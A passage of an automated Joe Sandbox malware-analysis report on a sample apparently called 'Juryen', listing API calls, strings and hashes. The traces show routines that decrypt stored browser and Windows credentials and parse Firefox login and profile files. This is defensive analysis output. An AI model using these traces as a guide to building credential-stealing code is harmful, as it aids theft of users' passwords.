                                                                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                      • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                    • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                    • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                                                    • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                    • API String ID: 2929817778-1134094380
                                                                    • Opcode ID: 6b2dcad71dd29105a6653737fa8e45fa2e3e7ed8fa5e3c17c72860e5870ea394
                                                                    • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                    • Opcode Fuzzy Hash: 6b2dcad71dd29105a6653737fa8e45fa2e3e7ed8fa5e3c17c72860e5870ea394
                                                                    • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                    • String ID: :stringdata$ftp://$http://$https://
                                                                    • API String ID: 2787044678-1921111777
APIs
• GetDlgItem.USER32(?,000003E9), ref: 0041402F
• GetDlgItem.USER32(?,000003E8), ref: 0041403B
• GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
• GetWindowLongW.USER32(?,000000F0), ref: 00414056
• GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
• GetWindowLongW.USER32(?,000000EC), ref: 0041406B
• GetWindowRect.USER32(00000000,?), ref: 0041407D
• GetWindowRect.USER32(?,?), ref: 00414088
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
• GetDC.USER32 ref: 004140E3
• wcslen.MSVCRT ref: 00414123
• GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
• ReleaseDC.USER32(?,?), ref: 00414181
• _snwprintf.MSVCRT ref: 00414244
• SetWindowTextW.USER32(?,?), ref: 00414258
• SetWindowTextW.USER32(?,00000000), ref: 00414276
• GetDlgItem.USER32(?,00000001), ref: 004142AC
• GetWindowRect.USER32(00000000,?), ref: 004142BC
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
• GetClientRect.USER32(?,?), ref: 004142E1
• GetWindowRect.USER32(?,?), ref: 004142EB
• SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
• GetClientRect.USER32(?,?), ref: 0041433B
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
Similarity
• API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
• String ID: %s:$EDIT$STATIC
• API String ID: 2080319088-3046471546
APIs
• EndDialog.USER32(?,?), ref: 00413221
• GetDlgItem.USER32(?,000003EA), ref: 00413239
• SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
• SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
• memset.MSVCRT ref: 00413292
• memset.MSVCRT ref: 004132B4
• memset.MSVCRT ref: 004132CD
• memset.MSVCRT ref: 004132E1
• memset.MSVCRT ref: 004132FB
• memset.MSVCRT ref: 00413310
• GetCurrentProcess.KERNEL32 ref: 00413318
• ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
• ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
• memset.MSVCRT ref: 004133C0
• GetCurrentProcessId.KERNEL32 ref: 004133CE
• memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
• wcscpy.MSVCRT ref: 0041341F
• _snwprintf.MSVCRT ref: 0041348E
• SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
• GetDlgItem.USER32(?,000003EA), ref: 004134B0
• SetFocus.USER32(00000000), ref: 004134B7
Strings
• {Unknown}, xrefs: 004132A6
• Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
Memory Dump Source
• Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
Similarity
• API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
• String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
• API String ID: 4111938811-1819279800
APIs
• GetDlgItem.USER32(?,000003EC), ref: 004011F0
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
• GetDlgItem.USER32(?,000003EE), ref: 00401238
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
• GetDlgItem.USER32(?,000003EC), ref: 00401273
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
• GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
• LoadCursorW.USER32(00000000,00000067), ref: 00401297
• SetCursor.USER32(00000000,?,?), ref: 0040129E
• GetDlgItem.USER32(?,000003EE), ref: 004012BF
• ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
• GetDlgItem.USER32(?,000003EC), ref: 004012E6
• SetBkMode.GDI32(?,00000001), ref: 004012F2
• SetTextColor.GDI32(?,00C00000), ref: 00401300
• GetSysColorBrush.USER32(0000000F), ref: 00401308
• GetDlgItem.USER32(?,000003EE), ref: 00401329
• EndDialog.USER32(?,?), ref: 0040135E
• DeleteObject.GDI32(?), ref: 0040136A
• GetDlgItem.USER32(?,000003ED), ref: 0040138F
• ShowWindow.USER32(00000000), ref: 00401398
• GetDlgItem.USER32(?,000003EE), ref: 004013A4
• ShowWindow.USER32(00000000), ref: 004013A7
• SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
• SetWindowTextW.USER32(?,00000000), ref: 004013CA
• SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
• SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
Memory Dump Source
• Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
Similarity
• API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
• String ID:
• API String ID: 829165378-0
APIs
• memset.MSVCRT ref: 00404172
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
• wcscpy.MSVCRT ref: 004041D6
• wcscpy.MSVCRT ref: 004041E7
• memset.MSVCRT ref: 00404200
• memset.MSVCRT ref: 00404215
• _snwprintf.MSVCRT ref: 0040422F
• wcscpy.MSVCRT ref: 00404242
• memset.MSVCRT ref: 0040426E
• memset.MSVCRT ref: 004042CD
• memset.MSVCRT ref: 004042E2
• _snwprintf.MSVCRT ref: 004042FE
• wcscpy.MSVCRT ref: 00404311
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
Similarity
• API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
• String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
• API String ID: 2454223109-1580313836
APIs
• GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
• GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
• GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
• GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
• GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
• GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
• GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
• GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
• GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll$p+vw@Fvw@Bvw
• API String ID: 667068680-772928780
APIs
  • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
• SetMenu.USER32(?,00000000), ref: 00411453
• SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
• GetModuleHandleW.KERNEL32(00000000), ref: 00411495
• LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
• GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
• CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
• memcpy.MSVCRT(?,?,00002008,?,00000000,/nosaveload,00000000,00000001), ref: 004115C8
• ShowWindow.USER32(?,?), ref: 004115FE
• GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
• GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
• RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
• SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
• SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
  • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
  • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
Similarity
• API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
• String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
• API String ID: 4054529287-3175352466
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
Similarity
• API ID: wcscat$_snwprintfmemset$wcscpy
• String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
• API String ID: 3143752011-1996832678
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                    • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: _snwprintf$memset$wcscpy
                                                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                    APIs
                                                                      • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                      • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                      • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                      • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                      • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                    • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                    • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                    • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                    • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                    • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                    • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                    • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                    • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                    • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                    Similarity
                                                                    • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                    • String ID:
                                                                    APIs
                                                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                    • free.MSVCRT ref: 0040E49A
                                                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                    • memset.MSVCRT ref: 0040E380
                                                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                      • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                    • wcschr.MSVCRT ref: 0040E3B8
                                                                    • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,771B2EE0), ref: 0040E3EC
                                                                    • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,771B2EE0), ref: 0040E407
                                                                    • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,771B2EE0), ref: 0040E422
                                                                    • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,771B2EE0), ref: 0040E43D
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                    • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                    APIs
                                                                    • ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                    • _snwprintf.MSVCRT ref: 0044488A
                                                                    • wcscpy.MSVCRT ref: 004448B4
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: ??2@??3@_snwprintfwcscpy
                                                                    • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040DBCD
                                                                    • memset.MSVCRT ref: 0040DBE9
                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                      • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                      • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                      • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                    • wcscpy.MSVCRT ref: 0040DC2D
                                                                    • wcscpy.MSVCRT ref: 0040DC3C
                                                                    • wcscpy.MSVCRT ref: 0040DC4C
                                                                    • EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
                                                                    • EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
                                                                    • wcscpy.MSVCRT ref: 0040DCC3
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                    • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                    APIs
                                                                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                      • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                    • memset.MSVCRT ref: 0040806A
                                                                    • memset.MSVCRT ref: 0040807F
                                                                    • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                    • _wcsicmp.MSVCRT ref: 004081C3
                                                                    • memset.MSVCRT ref: 004081E4
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                      • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                      • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                    • String ID: logins$null
                                                                    APIs
                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                    • memset.MSVCRT ref: 004085CF
                                                                    • memset.MSVCRT ref: 004085F1
                                                                    • memset.MSVCRT ref: 00408606
                                                                    • strcmp.MSVCRT ref: 00408645
                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                    • memset.MSVCRT ref: 0040870E
                                                                    • strcmp.MSVCRT ref: 0040876B
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                    • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                    • String ID: ---
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0041087D
                                                                    • memset.MSVCRT ref: 00410892
                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                    • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                    • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                    • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                    • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                    • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                    • GetSysColor.USER32(0000000F), ref: 00410999
                                                                    • DeleteObject.GDI32(?), ref: 004109D0
                                                                    • DeleteObject.GDI32(?), ref: 004109D6
                                                                    • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                    • String ID:
                                                                    • API String ID: 1010922700-0
                                                                    • Opcode ID: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                    • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                    • Opcode Fuzzy Hash: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                    • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                    APIs
                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
